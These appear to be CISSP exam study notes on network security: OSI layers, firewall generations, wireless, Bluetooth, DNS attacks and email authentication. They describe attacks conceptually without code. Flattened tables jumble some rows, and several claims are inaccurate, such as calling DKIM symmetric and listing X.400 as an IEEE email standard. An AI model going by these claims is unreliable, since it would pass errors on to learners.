EXAM POINTERS

DOMAIN 4
COMMUNICATION
AND
NETWORK SECURITY

ABHISHEK JHA
CISSP CISA CDPSE CEH
https://www.linkedin.com/in/abhishek-jha-b02a741aa/
 KEY CONCEPTS
Bridge Connect two different Network within LAN (Layer 2)
Brouters Router + Bridge. Route first, if fails then Bridge
Gateway Connect network using different protocol. IPv4 to IPv6
ARP Poisoning Change MAC in ARP Table (IP – MAC)
CSMA / CD Carrier Sense Multiple Access with Collision Detection. Eg Ethernet (802.3)
CSMA / CA Carrier Sense Multiple Access with Collision Avoidance. Eg Wireless (802.11)
Token Passing Token (24 Bit) act as carrier. No collision as No transmission without token.
Routing Protocols Distance Vector Direction & Distance in Hops. BGP (Connects ISPs), RIP, IGRP
Link State Determines Shortest Path. OSPF
SNMP v3 Manage Network devices. Only v3 as v2 is not secure
ICMP Attacks Loki Covert Channel. Send payload in ICMP Packets.
(Layer 3) Ping of Death Violates MTU (very large ping packet)
Ping Flood Too many packets of ping
Smurf ICMP Packet with victim address as source address. (RDDoS)
Counter: Block distributed broadcasts on routers
Layer 4 Attacks SYN Flood Send only SYN packets. Stateful firewall is needed to prevent
Fraggle Same to Smurf, but UDP (RDDoS)
Counter : Block distributed broadcasts on routers
Salami Many small attacks add up to equal a large attack
Data Diddling Altering/Manipulating data, usually before entry
Tear Drop (Layer 3) Sending Malformed packets which the OS does not know how to reassemble.
Buffer Overflow Attacks that overwhelm a specific type of memory on a system— the buffers.
Counter : Input Validation, Memory bounds / limits
Bonk Similar to Teardrop attack. Manipulates how a PC reassembles a packet and allows
it to accept a packet much too large.
Land Attack Creates a “circular reference” on a machine. Sends a packet where source and
destination are the same.
Virus A piece of malicious code that can take many forms and serve many purposes.
Needs a host in which to live, and an action by the user to spread
Worm Similar to a virus, but does not need a host and is self-replicating
Logic Bomb A type of malicious code that lays dormant until a logical event occurs
Trojan Horse One program (usually some type of malicious code) masquerades as another.
Common means of distributing Back Door Programs
Back Door Programs A Program that allows access (often administrative access) to a system that
bypasses normal security controls. Examples are NetBus, Back Orifice, SubSeven
Converged Protocols FCoE (L-3) For Network Data Storage solution
MPLS Direct data using short labels. High Throughput & Performance
iSCSI Location independent file storage transmission & retrieval over
LAN/ WAN. Cheap alternative to FCoE. Used in Cloud
VoIP Voice and Data over TCP/IP by means of Tunnel
SDN Network Virtualization. Separates CP and DP.
CDN (L-3) Replicated resource deployed at various geographies.
Low latency and high performance
NAC (Network Access NAC agent on Pre-Admission Before being allowed
Control) End Point Pre-Admission Monitors action & Allows / Denies
Secure IPSec Standard Architecture for VPN
Communication Kerberos Authentication protocol for SSO
Protocols SSH End to End encryption
Signal Protocol Enables secure communication
SRPC (L-7) Secure RPC
SSL Not Secure due Poodle Attack
TLS TLS 1.2 , can encrypt payload also.
Bastion Host Hardened appliance give access to internal Systems and faces internet
Screened Subnet aka DMZ. Between two firewall / routers / Bastion host
 OSI MODEL
LAYERS Responsibility Data Type Info Firewall Protocols TCP/ IP Model
7 APPLICATION User Application Services Data Gateways Kernel Proxy FW – HTTP, FTP, SSH, DNS, APPLICATION
Smartest Layer/ Content Layer/ Very Fast SNMP, SMTP
Certificates/ Non-Repudiation/ Hardware
Mail / API (Gen-5)
6 PRESENTATION Data Translation, Data File Level Formatting, Encryption SSL/ TLS, SSH, IMAP,
Compression & Encryption & Compression FTP, MPEG, JPEG
EFS (Encrypted File
Sys)
5 SESSION Session Establishment, Data Application to Application Stateful FW- Inspects, API, Socket, Winsock,
Management & understands traffic. It RPC, DNS, NFS, SQL
Termination Simplex, Half-Duplex, Full-Duplex allows protocols as
long as it behaves like
it should (Gen-3)
4 TRANSPORT End-to-End Connections, Segment SYN Flood – ICMP TCP, UDP, SSL/TLS, TRANSPORT
Segmentation and Fraggle – UDP (RDDoS) SPX Host To Host
Reassembly
3 NETWORK Logical Addressing, Packet / Router (Isolates Broadcast Static/Stateless FW – IP, ICMP, NAT, IPSec, INTERNET
Routing (Path Datagrams Traffic) Very Limited / All or ICMP, RIP, BGP, IKE,
Determination), Logical Addressing (IPSec for Nothing – FW blocks ISAKMP, FCoE, CDN
Datagram encapsulation, Security) the entire protocol
Error handling and PING Flood/ Ping of Death / (Gen-1)
Diagnostics Loki
Smurf Attack – Spoof source
address (RDDoS)
2 DATA LINK Logical Link Control (LLC) Frames Switch (Doesn’t broadcast Ethernet (802.3), LINK
Media Access Control Traffic), MAC, Ethernet, NIC , Wi-Fi (802.11),
(MAC) Tunneling – Encapsulation (L2TP 802.1x (NAC),
Data Framing, Addressing, gives the Tunnel / IPSec gives CHAP, EAP, PAP
Error Detection Security) PPP, PPTP, L2TP,
ARP, Switch, Bridge
1 PHYSICAL Encoding & Signaling, Bits Cable, Hub, Modem Coax, Fiber, Wireless,
Physical Data (No Addressing) Hubs Repeaters
Transmission, Hardware
Specifications, Topology
and Design
 FIREWALLS
ST
1 Gen Packet Filter, Static Packet Filtering, Stateless Firewall
(Layer 3) Uses ACL (Router + Filtering App)
(Stateless) Decision based on Source / Destination, IP & Port info.
Does not maintain the state of connection
Attacks on IST Gen FW (Packet Filter):
IP address Spoofing: Source IP address same as internal IP.
Counter: Discard outside packets coming in with source IP as internal IP.
Source Routing Attacks: the attacker specifies the route to be taken by the packet which
was otherwise to be decided by the router.
Counter: Drop packets with source routing enabled. (aka path addressing.)
Tiny Fragment Attacks: Attackers expect only first fragment to be examined and the rest
are allowed to pass.
Counter: Drop packets with tiny fragment configuration enabled.
2ND Gen Application FW (L-7) Inspects protocols (HTTPS, FTP etc).
(Proxy FW) (aka App Proxy) Slow due to extra processing (inspects each packet)
Circuit (L-5) Monitors TCP Handshake
(aka Circuit Proxy) Position between internal & external network
Eg SOCKS (Socket Secure). Blocks SYN attacks
3RD Gen Maintains connection table.
(L3 & 4) Can block ARP Poisoning attack
(Statefull) Can Launch DoS against itself by trying to fill up state table (end its resources)
Connections are disrupted if FW reboots
Content dependent access control
To be configured in Fail Secure (Block All)
4TH Gen Dynamic Packet filtering FW (Gen 1 + 3)
Deep Packet Filters payload contents rather than just headers
Inspection (L-7) Can block Domain Names, Malware, Spam or other identifiable elements in the payload.
5TH Gen Multi-Function Device and has several security feature in addition to a firewall
Next Gen FW It can have IDS/IPS, TLS/SSL proxy, Web-Filtering, QoS Mgmt, Bandwidth throttling, VPN,
(NGFW) NATing & AV solution.
Block un-necessary ICMP packets types.
(Be careful though, know your environment)
Keep ACLs simple
Use Implicit deny
Disallow source routed packets
Use least privilege
FIREWALL Block directed IP broadcasts
BEST Perform egress filtering Block traffic leaving the network from a non-internal address
PRACTICES (indicates the network is possibly being used as zombie
systems in a possible DDoS attack.)
Perform ingress filtering Block all traffic entering the network from an internal address
(indicates a potential spoofing attack)
Enable logging
Drop fragments or re-assemble fragments
Firewall Pointers  Most effective against unrequested traffic and attempts to connect from outside the
private network
 Typically block viruses or malicious code
 Static packet filtering FW filter traffic by examining message headers
 Application gateway level FW are also called proxies, and are mechanisms that copy
packets from one network to another
 Circuit level gateway FW establish communication sessions between trusted partners
 Stateful inspection FW, aka dynamic packet filtering, evaluate the state or the context of
network traffic
 Deep packet inspection FW filter the payload contents of a communication rather than
only basing filtering on header values
 Next gen FW are also composed of IDS, proxies, QoS Mgmt, and more
 Multi-homed firewalls have at least two interfaces to filter traffic between two networks
FW Deployment Count No. of Zones connected to FW
Singe Tier, Two Tier, Three Tier
 WIRELESS NETWORKS
Wireless cells Areas within a physical environment where a wireless device can connect to an
access point
802.11 IEEE standard for wireless network communications.
802.11i Security standard
Wi-Fi Ad hoc mode (aka peer-to-peer Wi-Fi) Between Two. Without AP/ Base Stn.
Deployment Ad hoc supports only WEP.
Wi-Fi Direct is an upgraded version of ad hoc that can support
WPA 2 and WPA 3
Infrastructure Wireless access point (WAP) is required.
mode Standalone Mode - When there is a wireless access point
connecting clients to each other but not to any wired resources.
Wired Extension Mode - When access points act as a connection
point to wired networks.
WEP Wired Equivalent Privacy - WEP
(Not Secure) Uses a predefined shared secret key (PSK)
Key is static and shared among all WAPs and devices
Uses Rivest Cipher 4 (RC4)
Weaknesses: static common key, and poor implementation of IVs (initiation vectors)
WPA WiFi Protected Access – WPA (Alternative to WEP)
(Not Secure) Uses TKIP to generate random key for each session instead of fixed PSK for all
devices.
Strong IV & uses RC 4
Compromised dues LEAP compromise by ASLEAP
WPA 2 AES (Block Cipher) – 128 Bit -- Counter Mode Cipher
Block Chaining Message Authentication Code Protocol
Uses 802.1x / EAP for authentication & has two types.
Personal Edition : Uses Pre-Shared Key
Enterprise Edition : Individual Password for Individual Users
WPA 3 Extension of WPA 2
AES – 192 Bit with CCM for Enterprise Edition
AES – 128 Bit for Personal Edition
WIRELESS ATTACKS War driving Looking for wireless networks they aren’t authorized to access.
War chalking Marking area for Wi-Fi presence.
Replay Retransmission of captured communications
Wireless Weak Encryption (due IV or Poor implementation)
Sniffing Or No Encryption
(Eg Air
Sniffing)
Rogue access Fake Wi-Fi Access Point
points
Evil twin Cloning the SSID of Wi-Fi already known to Phone/Device (that it
previously connected) and Transmitting the same SSID to
connect.
802.1x/EAP Standard port-based network access control, ensures that clients cannot
communicate until proper authentication has taken place
Uses RADIUS or TACAVS, certs, smart cards, etc.
Extensible Authentication Protocol - EAP, not a specific mechanism of authentication
PEAP Protected Extensible Authentication Protocol, EAP methods within a TLS tunnel
LEAP Lightweight EAP , Cisco proprietary , Should be avoided when possible
(Not Secure)
MAC Filter A list of authorized wireless MAC addresses, Blocks access to non-authorized
devices
TKIP Temporal Key Integrity Protocol
Improvements include key-mixing function that combines with the initialization vector
with the secret root key before using RC4 to perform encryption. Prevents replay
attacks
* WPA2 (Enterprise Edition) is the recommended to use amongst WEP, WPA etc.
* WPA3 with Enterprise Edition is the most secured.
 BLUETOOTH
BLUETOOTH Personal area network (PAN) Bluetooth Security: Device should not be in
(802.15) Do not have native security built in. Discoverable Mode. No Default Pairing.
Can only be secured by using PIN Pair only with Auth Codes.
Bluetooth Attacks Blue Jacking Sending spam messages through Bluetooth
Blue Snarfing Attacker connect to your Bluetooth and exfiltrate the data.
Blue Bugging Sending Bug through Bluetooth
ZIGBEE Protocol used to connect smart device in a PAN.
(802.15.4) Security: Ensure Network isolation and Proper Authentication.
* Bluetooth & Zigbee has same IEEE 802.15
Li-Fi Wall interception. Cannot be intercepted by MitM.

DNS
TLD Top Level Domain .com in www.google.com
Registered Domain Name google in www.google.com
Subdomain or hostname www in www.google.com
Primary authoritative name server - Hosts the original zone file for the domain
Secondary authoritative name server - Used to host read-only copies of the zone file
Zone file Collection of resource records or details about the specific domain
DNSSEC provides reliable authentication between devices during DNS operations
DNS Poisoning Falsifying the DNS information used by a client to reach a desired system
Involves attacking the real DNS server and placing incorrect information
into its zone file
Rogue DNS server aka DNS Spoofing, Pharming
Pharming Malicious redirection of a valid website’s URL or IP address to a fake
website that hosts a false version of the original valid site
Domain hijacking Changing the registration of a domain name without the authorization of
the valid owner

EMAIL SECURITY
X.400 Standard for addressing and message handling
POP3 (L-7) Downloads Email from server
IMAP (L-7) Gives option for Download or Delete from server
SMTP Helps in exchanging msg from & to server (Exchange svr-Windows , Sendmail-Unix)
SMTP Relay Open Relay- SMTP server that does not authenticate senders
Issues Open Relay can lead to spoofing, So secure relay by proper authentication.
*Spamming, mail bombing are some common issues which are hard to stop.
S/MIME Default standard for Email Security Signed – (AIN) – Signed using Digital Cert (X.509)
(PAIN) Enveloped - PAI
PGP Uses IDEA
DKIM Contains a list of verified Domain. Email’s Domain is matched against the list.
Challenge : When a genuine Domain is not in the list.
SPF The receiving mail server retrieves the HELO message and the sender address upon receipt. The
(Prevents receiving mail server then performs a TXT DNS query against the alleged domain SPF entry. The
Spoofing) SPF entry data is then used to validate the sender server. If the search fails, the sender server
receives a rejection message.
DKIM When sending an outgoing message, the domain infrastructure’s last server checks its internal
settings to see if the domain used in the “From:” header is in its “signing table.” If the procedure
does not end here, a new header named “DKIM-Signature” is applied to the mail message by using
the private part of the key on the message content.
The main content of the message cannot be changed from here on because the DKIM header will
no longer fit. Upon receipt, the receiving server will perform a TXT DNS query to retrieve the key
used in the DKIM-Signature sector. The DKIM header check result can then be used for deciding if a
message is fraudulent or trustworthy.
DMARC Upon receipt, the receiving mail server checks the DMARC record for any current DMARC policies
and/or DKIM checks in the domain used by the SPF.
If either or both of the SPF and DKIM checks pass while remaining consistent with the DMARC
policy, the check is considered successful; otherwise, if the DMARC check fails, based on the action
published by the DMARC policy, it is marked as failed. If the check fails, based on the action
published by the DMARC policy, different actions are taken.
 SPF DKIM DMARC
Expanded Form Sender Policy Domain Keys Identified Domain Based Message
Framework Mail Authentication Reporting &
Conformance
What is it? A system to declare & An email authentication An email authentication
verify who can send system based on system that helps determine
emails from a given symmetric what to do when an email
domain cryptographic keys fails SPF or DKIM checks
How does it work The receiving host The sending host signs The receiving host applies
checks if the sending email body and /or the DKIM and SPF checks.
host is permitted to send headers with its private Then it validates the results
emails from the sender key. The receiving host against the published
domain. The information verifies the signature, DMARC policy and decides
stating who can send identifying if the fields what to do: Block,
emails is stored in a TXT are intact. No digital Quarantine, Deliver or
record in the DNS Zone signature is required. Report to the sender. The
Public key is published DMARC policy is published
using DNS TXT via DNS TXT records.
records.
Why is it It helps prevent spoofing Greatly reduces no Helps the receiving
important ? and can prevent damage chance that your organized, decide what to
to your brand. messages are area as do with mails that fail
spam by digital checks and create a
signature. feedback loop to allow
course correction.
Pointers SPF is only concerned DKIM does not
with the MailFrom directly prevent
address. It is not abusive / malicious
checked against the behaviour. DKIM is
Header From address so just a signature
does not in any way
protect against header
from spoofing or display
name spoofing.
Uses Case  Envelope from spoofing... SPF

 Header from spoofing... SPF + DMARC, DKIM + DMARC, or SPF + DKIM +

DMARC. No one mechanism alone will be sufficient.

 Display name spoofing... Advanced threat filters, transport rules, and user
training. None of the mechanisms care about the display name.

 Compromised mailboxes or "legitimate" senders.... Advanced threat filters,

transport rules, and user training.

IEEE STANDARDS
802.3 Ethernet
802.11 Wireless
802.11ac Fastest Wireless
802.1x EAP
x.509 Digital Certificates
x.400 Email Security